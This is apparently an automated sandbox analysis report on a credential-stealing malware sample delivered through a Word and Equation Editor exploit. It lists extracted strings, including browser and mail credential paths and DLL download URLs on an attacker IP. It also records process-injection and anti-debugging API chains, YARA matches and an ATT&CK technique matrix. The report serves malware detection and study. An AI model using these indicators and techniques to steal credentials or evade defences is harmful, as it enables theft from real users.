          Source: efwhixxln.exe, 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_7-8836
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_6-6444
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_004010006_2_00401000
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 8_2_004010008_2_00401000
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_0040100011_2_00401000
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-10375
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1968Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1920Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_6-5151
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,7_2_0040BBA0
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-8390
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_0040100011_2_00401000
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_004010006_2_00401000
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040DB53 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,7_2_0040DB53
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end nodegraph_5-3480
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeAPI call chain: ExitProcess graph end nodegraph_6-5095
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeAPI call chain: ExitProcess graph end nodegraph_7-8319
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeAPI call chain: ExitProcess graph end nodegraph_7-9299
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeAPI call chain: ExitProcess graph end node
          Source: word.exe, 00000005.00000002.928229573.0000000000624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00230EBF GetSystemInfo,6_2_00230EBF
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405D74
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040699E FindFirstFileW,FindClose,5_2_0040699E
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040290B FindFirstFileW,5_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00408917 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,7_2_00408917
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040DA4F FindFirstFileW,FindNextFileW,7_2_0040DA4F
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_004067CC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_004067CC
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_0023005F mov eax, dword ptr fs:[00000030h]6_2_0023005F
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_0023013E mov eax, dword ptr fs:[00000030h]6_2_0023013E
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00230109 mov eax, dword ptr fs:[00000030h]6_2_00230109
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_0023017B mov eax, dword ptr fs:[00000030h]6_2_0023017B
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040E476 mov eax, dword ptr fs:[00000030h]7_2_0040E476
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040E141 mov eax, dword ptr fs:[00000030h]7_2_0040E141
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040E148 mov eax, dword ptr fs:[00000030h]7_2_0040E148
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_00416192 mov eax, dword ptr fs:[00000030h]7_2_00416192
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00401C99 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00401C99
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00408818 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_00408818
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00403C1E SetUnhandledExceptionFilter,6_2_00403C1E
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00401C99 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00401C99
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_00404F4C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00404F4C
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 8_2_00401C99 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00401C99
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 8_2_00403C1E SetUnhandledExceptionFilter,8_2_00403C1E
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 8_2_00404F4C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00404F4C
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_00401C99 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00401C99
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_00403C1E SetUnhandledExceptionFilter,11_2_00403C1E
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: 11_2_00404F4C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00404F4C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\efwhixxln.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040F6ED OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,7_2_0040F6ED
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe7_2_0040F7CD
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dlJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe C:\Users\user\AppData\Local\Temp\efwhixxln.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040D2C9 AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,7_2_0040D2C9
          Source: efwhixxln.exe, 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\13-01-2023_19.10.28{Program Manager}
          Source: efwhixxln.exe, 00000007.00000002.1182004901.000000000363F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: RProgram Manager
          Source: efwhixxln.exe, 13-01-2023_19.10.28.7.drBinary or memory string: {Program Manager}
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 6_2_004045B4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_004045B4
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 2672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 1792, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: POP3 Password7_2_00408DB8
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: SMTP Password7_2_00408DB8
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: IMAP Password7_2_00408DB8
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: \Google\Chrome\User Data\Default\Login Data7_2_0040ADBB

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 2672, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: efwhixxln.exe PID: 1792, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts23
          Native API
          1
          Create Account
          1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          2
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium23
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts23
          Exploitation for Client Execution
          1
          Windows Service
          1
          Windows Service
          2
          Obfuscated Files or Information
          221
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol221
          Input Capture
          Exfiltration Over Bluetooth21
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
          Endpoint Denial of Service
          Domain Accounts2
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          222
          Process Injection
          21
          Software Packing
          1
          Credentials In Files
          1
          System Service Discovery
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          Service Execution
          Logon Script (Mac)1
          Registry Run Keys / Startup Folder
          3
          Masquerading
          NTDS1
          System Network Connections Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Modify Registry
          LSA Secrets3
          File and Directory Discovery
          SSHKeyloggingData Transfer Size Limits213
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Virtualization/Sandbox Evasion
          Cached Domain Credentials17
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync1
          Query Registry
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job222
          Process Injection
          Proc Filesystem141
          Security Software Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Hidden Users
          /etc/passwd and /etc/shadow2
          Virtualization/Sandbox Evasion
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing2
          Process Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
          Remote System Discovery
          Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
